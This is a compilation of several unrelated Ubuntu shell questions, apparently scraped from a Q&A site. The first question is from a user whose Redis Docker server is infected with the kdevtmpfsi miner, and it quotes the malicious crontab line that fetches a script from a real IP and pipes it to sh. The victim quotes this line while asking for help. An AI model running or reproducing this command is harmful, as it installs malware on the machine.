Questions[sh](ubuntu)

My Ubuntu server has been infected by a virus kdevtmpfsi, I have already done serveral steps to solve this problem, like all of these: https://github.com/docker-library/redis/issues/217.

But it is still coming again and again when docker container with redis is running.

But there is stil one thing that I could not do, when I run the command for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done to see all users crontab, this is my output:

no crontab for gdm
fabio
* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
debian-tor
no crontab for debian-tor
deploy
no crontab for deploy
redis
no crontab for redis

There is a suspect job in crontab using wget to download a sh script, I cannot find how to delete this, and I am not sure if this will come back again when I turn on docker container with redis.

Look at the image above, the "user" that is running this virus is a user "999" I have no idea how this is possible because this user does not exist.

What could I do to solve this?

I am not so into Linux and I have the following doubts: a client provided me an Ubuntu 18.04.3 LTS virtual machine which I access via SSH. (I am using MobaxTerm as SSH client but it should not be the problem.) The shell used is sh.

The problem is that in the shell the autocomplete function is not working as I expected using the Tab key.

It simply put the classical tab white spaces.

Why? How can I change this configuration?

I had this script:

spd-say "Hello, don't forget the trash bin."

So it reminded me of what I supposed to do, and I moved it to /usr/local/bin/ and the command trash pronounced the argument,then I set a crontab job, to make it remind me everyday what I wanted to do. But the crontab didn't work and I couldn't understand why(It does other jobs flawlessly).

Once I saw this message in my terminal:

You have new mail in /var/mail/root

at the end of which this line made me do a bad mistake:

/bin/sh: 1: trash: not found

I know that it was a silly thing to do but I did:

mv /usr/local/bin/trash /bin/sh

thinking that sh is a directory and I should move the script there in order to be executed.

Now, when I want to see a man page the system says:

"Hello, don't forget the trash bin."

And the output of cat sh is:

#!/bin/bash
spd-say "Hello, don't forget the trash bin. "

Anyway, can I do anything or I have to reinstall my operating system?

I have a piece of software that requires /bin/sh to be Bash, but for Ubuntu the default is Dash and I want to keep it the default; I don't want to change it to Bash permanently.

Is there a way to change it only for a running terminal session? So a program running in this terminal will see /bin/sh linked to bash but the rest of the system will still see Dash? Or can I trick the software to see /bin/sh as Bash even if its not?

I didn't write this software and hacking it to use /bin/bash instead of /bin/sh is not really an option.

In the terminal, one way to reference home is by using ~/. I don't understand how this works, because the output of file ~/ is:

/home/admin/: directory

and just running ~/ results in:

-bash: /home/admin/: Is a directory

so what's converting ~/ into /home/admin?

~/ also appears to work in /bin/dash, so I also know it's not bash specific.